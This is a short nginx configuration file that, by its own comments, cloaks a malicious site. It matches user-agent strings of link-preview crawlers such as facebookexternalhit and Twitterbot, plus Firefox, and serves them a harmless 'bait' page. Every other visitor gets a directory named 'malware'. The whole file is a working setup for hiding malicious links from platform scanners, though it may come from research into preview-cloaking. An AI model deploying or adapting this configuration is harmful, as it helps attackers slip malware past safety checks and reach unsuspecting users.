# Discriminate user agents
# Show the "bait" site to crawlers
# Show the malware site to users
# Identify crawlers by a partial match with their user agent
map $http_user_agent $root {
    "~*FleepPreview" bait;
    "~*facebookexternalhit" bait;
    "~*Twitterbot" bait;
    "~*Firefox" bait;
    "~*Site-Short" bait;
    default malware;
}

server {
    listen       8080;
    server_name  localhost;

    location / {
        root   /usr/share/nginx/html/$root;
        try_files $uri $uri/ /index.html;
        index  index.html;
    }
}
